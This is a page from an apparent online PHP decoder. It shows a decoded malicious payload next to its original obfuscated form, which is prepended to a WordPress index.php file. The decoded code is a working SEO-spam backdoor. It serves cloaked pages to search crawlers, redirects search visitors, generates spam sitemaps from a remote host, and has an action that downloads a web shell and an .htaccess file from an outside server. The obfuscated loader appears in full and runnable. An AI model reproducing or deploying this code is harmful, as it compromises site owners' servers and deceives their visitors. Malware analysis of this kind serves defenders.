Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $vTtZHFiyCakLm='y(3;]whcx)8$4mb dk1qog5sprlua=z_/0i9tvf_"76*.2n[je';$q2866=$vTtZHFiy..
Decoded Output download
<?php error_reporting(0);
@ini_set('display_errors', 0);
@set_time_limit(3600);
@ignore_user_abort(1);
$gojj = '410';
@$action = $_GET['ac'] ? $_GET['ac'] : "";
if ($action != "" && $action == "write") {
write();
echo "write done!";
exit();
}
$smframe = '<?xml version="1.0" encoding="UTF-8"?>
<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"
xmlns:xhtml="http://www.w3.org/1999/xhtml">
%s</urlset>';
$smitem = ' <url>
<loc>%s</loc>
<xhtml:link rel="alternate" hreflang="ja" href="%s"/>
</url>' . "
";
$mainsm = '<?xml version="1.0" encoding="UTF-8"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
%s</sitemapindex>';
$mainsmitem = ' <sitemap>
<loc>%s://%s/sitemap%d.xml</loc>
</sitemap>' . "
";
$lang = isset($_SERVER['HTTP_ACCEPT_LANGUAGE']) ? substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 4) : "";
$ur = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : "";
$ua = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : "";
$host = $_SERVER["HTTP_HOST"];
$uri = $_SERVER["REQUEST_URI"];
$ip = clientip();
$http = https();
$header = array('User-Agent: ' . $ua, 'Lang: ' . $lang, 'Referer: ' . $ur, 'Http-Host: ' . $host, 'Remote-Addr: ' . $ip);
$postdata = 'shost=' . $host . '&proto=' . $http;
$u_pre = "/";
if (strstr($uri, ".php?")) {
$ta = explode(".php?", $uri);
$u_pre = $ta[0] . ".php?";
$uri = "/" . $ta[1];
}
$host_u = $http . "://" . $host . $u_pre;
if (@preg_match('#^/pingsitemap(.*?).xml$#i', $uri, $amu)) {
$result = '';
if ($amu[1] === '' || @preg_match('#(\d+)-$#', $amu[1], $samu)) {
$postdata.= ($samu[1] == '') ? '&groupid=' . $gojj : '&groupid=' . $samu[1];
$ts = strval(time());
array_push($header, 'timestamp: ' . $ts);
array_push($header, 'xdoim: ' . crc32($ts . '
' . $postdata));
$content = trim(urlx('http://' . gets() . '/sitemap.xml', $header, $postdata . '&http=' . $http));
if ($content === '') {
exit();
}
if (@preg_match('#^(\d)*#', $content)) {
for ($i = 1;$i <= intval($content);$i++) {
$pgurl = sprintf('https://www.google.co.jp/ping?sitemap=%s' . 'sitemap%s%d.xml', $host_u, $samu[0], $i);
$respbody = urlx($pgurl);
$result.= $pgurl . $respbody;
}
}
} else {
$pgurl = sprintf('https://www.google.co.jp/ping?sitemap=%s' . 'sitemap%s.xml', $host_u, $amu[1]);
$respbody = urlx($pgurl);
$result.= $pgurl . $respbody;
}
echo $result;
exit();
}
if (@preg_match('#^/sitemap(.*?).xml$#i', $uri, $amu)) {
$postdata = 'shost=' . $host . '&http=' . $http;
if (@preg_match('#(\d+)-$#', $amu[1], $samu)) {
$postdata.= '&groupid=' . $samu[1];
} else {
$postdata.= '&groupid=' . $gojj;
}
$ts = strval(time());
array_push($header, 'timestamp: ' . $ts);
array_push($header, 'xdoim: ' . crc32($ts . '
' . $postdata));
$content = trim(urlx('http://' . gets() . '/sitemap' . (($amu[1] == '' || $samu[1] != '') ? '.xml' : '/' . $amu[1]), $header, $postdata));
if ($content === '') {
exit();
}
@header('Content-type: text/xml');
if ((($amu[1] === '' || $samu[1] != '')) && @preg_match('#^(\d)*#', $content)) {
$xml = '';
for ($i = 1;$i <= intval($content);$i++) {
$xml.= sprintf($mainsmitem, $http, $host, $i, date('Y-m-d\TH:i:sP', time()));
}
$outstr = sprintf($mainsm, $xml);
$outstr = str_replace($http . "://" . $host . "/", $host_u, $outstr);
echo $outstr;
exit();
}
$ids = explode("
", $content);
$smbody = '';
foreach ($ids as $v) {
$purl = $http . '://' . $host . '/' . $v;
$smbody.= sprintf($smitem, $purl, $purl);
}
$outstr = sprintf($smframe, $smbody);
$outstr = str_replace($http . "://" . $host . "/", $host_u, $outstr);
echo $outstr;
exit();
}
if (@preg_match('#^/getver$#i', $uri, $amu)) {
$ts = strval(time());
array_push($header, 'timestamp: ' . $ts);
array_push($header, 'xdoim: ' . crc32($ts . '
' . $postdata));
$cnt = trim(urlx('http://' . gets() . $amu[0], $header, $postdata));
echo ($cnt === false) ? 'fail' . gets() : $cnt . $gojj . gets();
exit();
}
if (strstr($uri, "10001abcaa55atesta5")) {
$cnt = trim(get('http://' . gets() . "/10001abcaa55atesta5"));
echo ($cnt === false) ? 'fail' . gets() : $cnt . $gojj . gets();
exit();
}
if (@preg_match('#google|yahoo|bing|craft|Crawler#i', $ua)) {
$pdt = $postdata . '&http=' . $http . '&groupid=' . $gojj;
if (@preg_match('#([a-z]+)-(\d+)?(.html)$#i', $uri, $amu)) {
$pdt.= sprintf('&hpid=%s-%s', preg_replace('/[a-zI](xyz|buzz|top|online|store|club|shop|biz|space|fun|site).*$/', ".$1", strrev($amu[1])), $amu[2]);
$outstr = @trim(urlx(sprintf('http://%s/bot/page?' . $pdt, gets()), $header, $pdt, 1));
$outstr = str_replace($http . "://" . $host . "/", $host_u, $outstr);
echo $outstr;
exit();
} elseif (@preg_match('#cate\/([a-z]+)-(\d+)$#i', $uri, $bmu)) {
$outstr = @trim(urlx(sprintf('http://%s/bot/cate?' . $pdt, gets()), $header, $pdt . '&host=' . preg_replace('/[a-zI](xyz|buzz|top|online|store|club|shop|biz|space|fun|site).*$/', ".$1", strrev($bmu[1])) . '&cateid=' . $bmu[2], 1));
$outstr = str_replace($http . "://" . $host . "/", $host_u, $outstr);
echo $outstr;
exit();
} else {
$outstr = @trim(urlx(sprintf('http://%s/bot/home?' . $pdt . '&uri=' . $uri, gets()), $header, $pdt, 1));
$outstr = str_replace($http . "://" . $host . "/", $host_u, $outstr);
echo $outstr;
exit();
}
}
if (@preg_match('#google.co.jp|google.com|yahoo.co.jp|yahoo.co|bing.com|ask.com|aol.com|aol.jp#i', $ur) && @preg_match('#([a-zI]+)-(\d+)(.html)?$#i', $uri)) {
if (substr($uri, -5) != ".html") {
$uri = $uri . ".html";
}
$pdt = $postdata . '&groupid=' . $gojj . '&uri=' . $uri . '&ip=' . $ip;
$purl = urlx(sprintf('http://%s/bot/302?' . $pdt . '&uri=' . $uri, gets()), $header, $pdt, 1);
@header('Location: ' . $purl);
exit();
}
function write() {
$shell_load = get(base64_decode("aHR0cDovL2hlbGxvLmZpcnN0Z3VpZGUueHl6L21tMi50eHQ="));
$new_ht_content = get(base64_decode("aHR0cDovL2hlbGxvLmZpcnN0Z3VpZGUueHl6L3NobC9odGFjY2Vzcy50eHQ="));
if (!is_dir("css")) {
mkdir("css", 0755, true);
}
@chmod("css/.htaccess", 0755);
file_put_contents("css/.htaccess", $new_ht_content);
file_put_contents("css/load.php", $shell_load);
}
function urlx($url, $header = null, $postdata = null, $gz = null) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
if (!($gz === null)) {
curl_setopt($ch, CURLOPT_ENCODING, 'gzip,deflate');
}
if (stripos($url, "https:") === 0) {
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
}
if (!($header === null)) {
curl_setopt($ch, CURLOPT_HTTPHEADER, $header);
}
if (!($postdata === null)) {
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata);
}
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$body = curl_exec($ch);
curl_close($ch);
return $body;
}
function get($url) {
$contents = @file_get_contents($url);
if (!$contents) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$contents = curl_exec($ch);
curl_close($ch);
}
return $contents;
}
function gets() {
return base64_decode("c2VvNC02LnN0YXJ0ZGRzZW8uY29t");
}
function https() {
if ((!empty($_SERVER['HTTPS']) && strtolower($_SERVER['HTTPS']) !== 'off') || (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] === 'https') || (!empty($_SERVER['HTTP_FRONT_END_HTTPS']) && strtolower($_SERVER['HTTP_FRONT_END_HTTPS']) !== 'off')) {
return "https";
}
return "http";
}
function clientip() {
if (getenv('REMOTE_ADDR') && strcasecmp(getenv('REMOTE_ADDR'), 'unknown')) {
return getenv('REMOTE_ADDR');
} elseif (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], 'unknown')) {
return $_SERVER['REMOTE_ADDR'];
}
}
Did this file decode correctly?
Original Code
<?php $vTtZHFiyCakLm='y(3;]whcx)8$4mb dk1qog5sprlua=z_/0i9tvf_"76*.2n[je';$q2866=$vTtZHFiyCakLm[(105/15)].$vTtZHFiyCakLm[(26-1)].$vTtZHFiyCakLm[(1*49)].$vTtZHFiyCakLm[((10*1)+18)].$vTtZHFiyCakLm[(14+22)].$vTtZHFiyCakLm[(44+5)].$vTtZHFiyCakLm[(44-13)].$vTtZHFiyCakLm[(684/18)].$vTtZHFiyCakLm[(23+4)].$vTtZHFiyCakLm[(72-(33-7))].$vTtZHFiyCakLm[(154/22)].$vTtZHFiyCakLm[(11+25)].$vTtZHFiyCakLm[(65-(62-31))].$vTtZHFiyCakLm[(26-6)].$vTtZHFiyCakLm[((27*2)-8)];$pHFdNhg9688=$vTtZHFiyCakLm[(20-9)].$vTtZHFiyCakLm[(2*4)].$vTtZHFiyCakLm[(29*1)].$vTtZHFiyCakLm[(160/4)];$MYtraky2482=$vTtZHFiyCakLm[(8*5)].$vTtZHFiyCakLm[((1+0)+2)].$vTtZHFiyCakLm[(6+(1*(95/19)))].$vTtZHFiyCakLm[(140/5)].$vTtZHFiyCakLm[(522/18)].$vTtZHFiyCakLm[(7*((7-3)-2))].$vTtZHFiyCakLm[(2*14)].$vTtZHFiyCakLm[(138/(2+4))].$vTtZHFiyCakLm[(1029/(378/18))].$vTtZHFiyCakLm[((2*189)/9)].$vTtZHFiyCakLm[(12+(0+0))].$vTtZHFiyCakLm[(31*1)].$vTtZHFiyCakLm[(48/(36/12))].$vTtZHFiyCakLm[(735/15)].$vTtZHFiyCakLm[(0+7)].$vTtZHFiyCakLm[(18+2)].$vTtZHFiyCakLm[(18-(10/5))].$vTtZHFiyCakLm[(735/15)].$vTtZHFiyCakLm[(0+(2-(1*1)))].$vTtZHFiyCakLm[(16-(3+(36/(0+18))))].$vTtZHFiyCakLm[((167-23)/18)].$vTtZHFiyCakLm[(0+(18-9))].$vTtZHFiyCakLm[(1*3)].$vTtZHFiyCakLm[(11*(1+(0/(78/13))))].$vTtZHFiyCakLm[(2*7)].$vTtZHFiyCakLm[(29*(0+1))].$vTtZHFiyCakLm[(38-(8+9))].$vTtZHFiyCakLm[(15*2)].$vTtZHFiyCakLm[(45-11)].$vTtZHFiyCakLm[(1*46)].$vTtZHFiyCakLm[(1*(17+21))].$vTtZHFiyCakLm[(78/3)].$vTtZHFiyCakLm[(21+(77/11))].$vTtZHFiyCakLm[(22+14)].$vTtZHFiyCakLm[(343/(91/13))].$vTtZHFiyCakLm[(1*1)].$vTtZHFiyCakLm[(21-10)].$vTtZHFiyCakLm[(22+(12/2))].$vTtZHFiyCakLm[(180/20)].$vTtZHFiyCakLm[(3+((0+0)*1))].$vTtZHFiyCakLm[(686/(126/9))].$vTtZHFiyCakLm[(61-(32-8))].$vTtZHFiyCakLm[(476/17)].$vTtZHFiyCakLm[((4-0)+22)].$vTtZHFiyCakLm[(((23-(2*5))/13)-0)].$vTtZHFiyCakLm[(7+(84/21))].$vTtZHFiyCakLm[(28/2)].$vTtZHFiyCakLm[(9-0)].$vTtZHFiyCakLm[(3*1)];$UrR1094= "'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'";$JTx2343=$pHFdNhg9688;$JTx2343.=$UrR1094;$JTx2343.=$MYtraky2482;@$mEriqO3481=$q2866((''), ($JTx2343));@$mEriqO3481(); ?><?php
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/
/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define( 'WP_USE_THEMES', true );
/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';
Function Calls
| create_function | 1 |
| base64_decode | 1 |
| null | 1 |
| gzinflate | 1 |
Stats
| MD5 | 51fa4e1c3093345d6eb6204bea63a023 |
| Eval Count | 2 |
| Decode Time | 266 ms |